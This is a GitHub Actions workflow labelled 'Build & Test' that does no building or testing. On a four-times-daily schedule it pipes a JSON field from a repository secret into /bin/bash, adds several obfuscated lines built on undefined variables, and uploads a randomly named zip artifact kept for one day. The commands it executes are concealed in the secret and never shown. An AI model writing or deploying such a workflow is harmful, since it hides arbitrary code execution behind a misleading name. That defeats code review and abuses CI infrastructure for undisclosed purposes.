name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '41 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          epp1924: ${{ secrets.epp1924 }}
        run: |
          printf '%s' "$epp1924" | jq -r .n25956 | /bin/bash
          printf '%s' "$fwzdq01" | jq -r .d81 | /bin/bash
          echo $ei1 | jq -r .mx757 | /bin/bash
          printf '%s' "$dtv95" | jq -r .zpcof68608 | /bin/bash
          printf '%s' "$id53" | jq -r .u6626 | /bin/bash
          printf '%s' "$u0056" | jq -r .x27 | /bin/bash
          printf '%s' "$l33" | jq -r .i52 | /bin/bash
          echo $fzuv96927 | jq -r .sa616 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 2UMxUL8L
          path: "*.zip"
          retention-days: 1
